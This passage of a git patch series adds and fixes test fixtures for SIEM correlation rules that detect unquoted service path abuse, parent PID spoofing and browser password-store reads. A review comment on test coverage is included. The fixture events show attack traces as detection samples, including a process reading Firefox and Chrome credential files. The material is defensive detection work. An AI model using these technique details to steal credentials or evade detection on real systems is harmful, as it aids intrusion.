"PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "incorrect_time": false, "input_id": "00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "S-1-5-18", "object.account.name": "system", "object.account.privileges": "System", "object.account.provider": "local", "object.account.session_id": "999", "object.hash": "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.id": "4556", "object.name": "simple.exe", "object.path": "c:\\programdata\\simple service\\", "object.process.chain": "simple.exe (file creator: cmd.exe ← explorer.exe ← userinit.exe ← winlogon.exe ← smss.exe ← smss.exe) ← services.exe ← wininit.exe ← smss.exe ← smss.exe ← system", "object.process.cmdline": "\"C:\\ProgramData\\Simple Service\\Simple\" Service.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\programdata\\simple service\\simple.exe", "object.process.guid": "20fff121-e0f9-6481-3701-000000003b00", "object.process.hash": "IMPHASH:272245E2988E1E430500B852C4FB5E18 MD5:911D039E71583A07320B32BDE22F8E22 SHA256:BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "911D039E71583A07320B32BDE22F8E22", "object.process.hash.sha256": "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.process.id": "4556", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "simple.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": 
"20fff121-dbdd-6481-0b00-000000003b00", "object.process.parent.id": "648", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\programdata\\simple service\\", "object.process.version": "10.0.17763.1697 (WinBuild.160101.0800)", "object.property": "metadata", "object.value": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.version": "10.0.17763.1697 (WinBuild.160101.0800)", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "2.3.4.5", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "S-1-5-18", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "subject.domain": "nt authority", "subject.name": "system", "subject.state": "on behalf of oneself", "tag": "wineventlog", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-08T14:08:57.6580000Z", "uuid": "041a90cf-0606-01ee-9454-005056825a53"} +{"action": "start", "body": "{ \"Event\": { \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\", \"System\": { \"Provider\": { \"Name\": \"Microsoft-Windows-Sysmon\", \"Guid\": \"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\" }, \"EventID\": \"1\", \"Version\": \"5\", \"Level\": \"4\", \"Task\": \"1\", \"Opcode\": \"0\", \"Keywords\": \"0x8000000000000000\", \"TimeCreated\": { \"SystemTime\": 
\"2023-06-08T13:40:03.172021100Z\" }, \"EventRecordID\": \"830642\", \"Correlation\": null, \"Execution\": { \"ProcessID\": \"2320\", \"ThreadID\": \"3856\" }, \"Channel\": \"Microsoft-Windows-Sysmon/Operational\", \"Computer\": \"wks05.example.com\", \"Security\": { \"UserID\": \"S-1-5-18\" } }, \"EventData\": { \"Data\": [ { \"text\": \"-\", \"Name\": \"RuleName\" }, { \"text\": \"2023-06-08 13:39:54.919\", \"Name\": \"UtcTime\" }, { \"text\": \"{20fff121-da2a-6481-2900-000000003a00}\", \"Name\": \"ProcessGuid\" }, { \"text\": \"2332\", \"Name\": \"ProcessId\" }, { \"text\": \"C:\\\\program.exe\", \"Name\": \"Image\" }, { \"text\": \"10.0.17763.1697 (WinBuild.160101.0800)\", \"Name\": \"FileVersion\" }, { \"text\": \"Windows Command Processor\", \"Name\": \"Description\" }, { \"text\": \"Microsoft® Windows® Operating System\", \"Name\": \"Product\" }, { \"text\": \"Microsoft Corporation\", \"Name\": \"Company\" }, { \"text\": \"Cmd.Exe\", \"Name\": \"OriginalFileName\" }, { \"text\": \"C:\\\\Program Files\\\\Simple Service\\\\SimpleService.exe\", \"Name\": \"CommandLine\" }, { \"text\": \"C:\\\\Windows\\\\system32\\\\\", \"Name\": \"CurrentDirectory\" }, { \"text\": \"NT AUTHORITY\\\\SYSTEM\", \"Name\": \"User\" }, { \"text\": \"{20fff121-da26-6481-e703-000000000000}\", \"Name\": \"LogonGuid\" }, { \"text\": \"0x3e7\", \"Name\": \"LogonId\" }, { \"text\": \"0\", \"Name\": \"TerminalSessionId\" }, { \"text\": \"System\", \"Name\": \"IntegrityLevel\" }, { \"text\": \"MD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18\", \"Name\": \"Hashes\" }, { \"text\": \"{20fff121-da26-6481-0b00-000000003a00}\", \"Name\": \"ParentProcessGuid\" }, { \"text\": \"652\", \"Name\": \"ParentProcessId\" }, { \"text\": \"C:\\\\Windows\\\\System32\\\\services.exe\", \"Name\": \"ParentImage\" }, { \"text\": \"C:\\\\Windows\\\\system32\\\\services.exe\", \"Name\": \"ParentCommandLine\" }, { 
\"text\": \"NT AUTHORITY\\\\SYSTEM\", \"Name\": \"ParentUser\" } ] } } }", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "20fff121-da26-6481-e703-000000000000", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Program Files\\Simple Service\\SimpleService.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\program.exe", "object.process.guid": "20fff121-da2a-6481-2900-000000003a00", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "911D039E71583A07320B32BDE22F8E22", "object.process.hash.sha256": "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.process.id": "2332", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "program.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "20fff121-da26-6481-0b00-000000003a00", "object.process.parent.id": "652", "object.process.parent.name": 
"services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\", "object.process.version": "10.0.17763.1697 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-09T08:40:35.417Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-08T13:39:54.919Z", "type": "raw", "uuid": "b89e3ad3-59bb-4b09-896a-cdb6ddbb2c1e"}
-#случай, когда в пути к сервису несколько пробелов и хакеры используют не первый
-expect 1 {"alert.key": "c:\\programdata\\simple service\\simple.exe|\"c:\\programdata\\simple service\\simple\" service.exe", "correlation_name": "Unquoted_Service_Path_Abuse"}
+expect 1 {"action": "start", "alert.key": "c:\\program.exe|c:\\program files\\simple service\\simpleservice.exe", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Hijack Execution Flow: Path Interception by Unquoted Path", "correlation_name": "Unquoted_Service_Path_Abuse", "correlation_type": "incident", "datafield6": "20fff121-da26-6481-e703-000000000000", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Unquoted_Service_Path_Abuse|c:\\program.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.session_id": "999", 
"object.process.cmdline": "C:\\Program Files\\Simple Service\\SimpleService.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\program.exe", "object.process.guid": "20fff121-da2a-6481-2900-000000003a00", "object.process.hash.md5": "911D039E71583A07320B32BDE22F8E22", "object.process.hash.sha256": "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.process.id": "2332", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "program.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "20fff121-da26-6481-0b00-000000003a00", "object.process.parent.id": "652", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\", "object.process.version": "10.0.17763.1697 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999"}
\ No newline at end of file
From ed90660c31071622d6315e4d1cc1b4db51844e00 Mon Sep 17 00:00:00 2001 
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Mon, 21 Aug 2023 12:53:05 +0300
Subject: [PATCH 55/57] =?UTF-8?q?Create=20test=5F1.sc=20=D0=BC=D0=BE=D0=B4?= =?UTF-8?q?=D1=83=D0=BB=D1=8C=D0=BD=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82?= =?UTF-8?q?=D1=8B=20=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8?= =?UTF-8?q?=D0=BB=D0=B0(ParentPid=5FSpoofing)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../ParentPid_Spoofing/tests/test_1.sc | 4 ++++
 1 file changed, 4 insertions(+)
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ParentPid_Spoofing/tests/test_1.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ParentPid_Spoofing/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ParentPid_Spoofing/tests/test_1.sc
new file mode 100644
index 00000000..f4e50722
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_defense_evasion/ParentPid_Spoofing/tests/test_1.sc 
@@ -0,0 +1,4 @@
+{"action": "start", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-06a4-5e76-0000-002087de0200", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "188039", "object.process.cmdline": "\"C:\\windows\\system32\\cmd.exe\"", "object.process.cwd": "c:\\Users\\Public\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-8ae0-5e76-0000-0010933b8003", "object.process.hash": "IMPHASH:272245E2988E1E430500B852C4FB5E18 MD5:975B45B669930B0CC773EAF2B414206F SHA1:8C5437CD76A89EC983E3B364E219944DA3DAB464 SHA256:3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "7708", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": 
"C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-06aa-5e76-0000-001046e10400", "object.process.parent.id": "4668", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.592 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T13:30:02.746Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "188039", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-03-21T21:45:04.909Z", "type": "raw", "uuid": "31b2d27d-630e-450c-a82d-0cfc2b0b8cdd"}
+{"_rule": "Subrule_ParentPid_Spoofing", "action": "access", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Access Token Manipulation: Parent PID Spoofing", "correlation_name": "Subrule_ParentPid_Spoofing", "correlation_type": "subrule", "count": 1, "datafield5": "108", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+a0fa4|C:\\Windows\\System32\\KERNELBASE.dll+48142|C:\\Windows\\System32\\KERNELBASE.dll+45a1a|C:\\Windows\\System32\\KERNELBASE.dll+455a6|C:\\Windows\\System32\\KERNEL32.DLL+1c153|UNKNOWN(00007FF9A864DCCE)", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "correlationengine", "importance": "info", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-8ae0-5e76-0000-0010933b8003", 
"object.process.id": "7708", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.id": "4668", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff|0x1f3fff", "origin_app_id": "00000000-0000-0000-0000-000000000005", "primary_siem_app_id": "00000000-0000-0000-0000-000000000005", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "747f3d96-26fd-5e76-0000-00100a320d01", "subject.process.id": "8004", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "time": "2020-03-21T21:45:07.909Z"}
+
+expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Access Token Manipulation: Parent PID Spoofing", "correlation_name": "ParentPid_Spoofing", "correlation_type": "event", "datafield6": "747f3d96-06a4-5e76-0000-002087de0200", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "ParentPid_Spoofing|msedgewin10|synthetic:ieuser@msedgewin10", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.session_id": "188039", "object.process.cmdline": "\"C:\\windows\\system32\\cmd.exe\"", "object.process.cwd": "c:\\Users\\Public\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": 
"747f3d96-8ae0-5e76-0000-0010933b8003", "object.process.hash": "IMPHASH:272245E2988E1E430500B852C4FB5E18 MD5:975B45B669930B0CC773EAF2B414206F SHA1:8C5437CD76A89EC983E3B364E219944DA3DAB464 SHA256:3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "7708", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "C:\\Windows\\Explorer.EXE", "object.process.parent.fullpath": "c:\\windows\\explorer.exe", "object.process.parent.guid": "747f3d96-06aa-5e76-0000-001046e10400", "object.process.parent.id": "4668", "object.process.parent.name": "explorer.exe", "object.process.parent.path": "c:\\windows\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.592 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "188039", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "747f3d96-26fd-5e76-0000-00100a320d01", "subject.process.id": "8004", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\"}
\ No newline at end of file
From dbd3fd56c9987eab53df15035b4440ee8d878c2c Mon Sep 17 00:00:00 2001 
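Review bot: The second input line is a hand-written `Subrule_ParentPid_Spoofing` result (`"_rule"`, `"correlation_type": "subrule"`, `"generator.type": "correlationengine"`) rather than the raw Sysmon process-access event the subrule is built from, so this test only checks the parent rule's join with the subrule output and will keep passing if the subrule's own condition or emitted fields drift. Either a sibling test that feeds the raw event through the subrule, or a comment stating where the subrule is covered, would close that gap. The file also carries no scenario comment although the format supports `#` lines (the Unquoted_Service_Path_Abuse test earlier in this series uses one); a line such as `# cmd.exe starts with explorer.exe as parent while the process-access subrule attributes the 0x1fffff handle to powershell.exe; expect one ParentPid_Spoofing event` above the first event would make the intent readable. The three-second gap between the process start (21:45:04.909Z) and the subrule event (21:45:07.909Z) is presumably inside the rule's window, but nothing in the file records what that window is.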
From: Aleksandr Duplenko
Date: Thu, 6 Feb 2025 11:20:51 +0200
Subject: [PATCH 56/57] fix Chrome_firefox_opera_cred_read test 4
---
 .../Chrome_firefox_opera_cred_read/tests/test_4.sc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc
index 61caf538..02fbfb94 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc 
@@ -3,4 +3,4 @@
 {"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:18.6997552Z\"},\"EventRecordID\":\"4990\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"56\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\kushu3sd.default\\\\logins.json\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", 
"mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\logins.json", "object.name": "logins.json", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:34:14.538Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:18.699Z", "type": "raw", "uuid": "66323e2c-df36-488d-8914-e739970cd231"}
 {"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:50.1342936Z\"},\"EventRecordID\":\"4991\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"44\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", 
"normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:34:14.538Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:50.134Z", "type": "raw", "uuid": "bed7249b-e9ad-4925-ac6d-1dfa9cf3582e"}
-expect 4 {"action": "read", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores", "correlation_name": "Chrome_firefox_opera_cred_read", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "correlationengine", "importance": "medium", "object": "file", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", 
"subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\"}
\ No newline at end of file
+expect 4 {"action":"read","category.generic":"Attack","category.high":"Credential Access","category.low":"Credentials from Password Stores","correlation_name":"Chrome_firefox_opera_cred_read","correlation_type":"incident","event_src.category":"Operating system","event_src.host":"iewin7","event_src.hostname":"iewin7","event_src.subsys":"Security","event_src.title":"windows","event_src.vendor":"microsoft","generator.type":null,"importance":"medium","object":"file","object.property":"GrantedAccess","object.type":"file","object.value":"0x1","status":"success","subject":"account","subject.account.domain":"iewin7","subject.account.id":"S-1-5-21-3583694148-1414552638-2922671848-1000","subject.account.name":"ieuser","subject.account.privileges":"%%4416","subject.account.session_id":"65448","subject.process.fullpath":"C:\\Users\\Defau1t\\wsus.exe","subject.process.id":"4940","subject.process.name":"wsus.exe","subject.process.path":"C:\\Users\\Defau1t\\"}
\ No newline at end of file
From 468db61faf0d970bf78da4d6ffc7e545ee5a0e2b Mon Sep 17 00:00:00 2001
From: Aleksandr Duplenko
Date: Thu, 6 Feb 2025 13:31:44 +0200
Subject: [PATCH 57/57] fix UAC_Bypass_Via_Consent test 3
---
 .../UAC_Bypass_Via_Consent/tests/test_3.sc | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)
